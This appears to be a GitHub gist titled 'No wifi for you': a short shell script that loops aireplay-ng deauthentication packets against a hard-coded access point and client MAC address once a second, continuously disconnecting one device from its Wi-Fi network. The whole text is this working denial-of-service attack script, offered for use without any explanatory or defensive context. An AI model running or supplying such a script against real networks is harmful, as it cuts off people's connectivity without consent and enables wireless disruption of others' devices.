Created
April 29, 2015 04:54
-
-
Save lionaneesh/66479d03b41907f00bc9 to your computer and use it in GitHub Desktop.
No wifi for you
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ACCESS_POINT="C4:0A:CB:2D:81:B4" | |
DEVICE_POINT="A4:DB:30:D9:55:14" | |
while : | |
do | |
sudo aireplay-ng -0 1 -a "$ACCESS_POINT" -c "$DEVICE_POINT" mon0 --ignore-negative-one; | |
sleep 1 | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment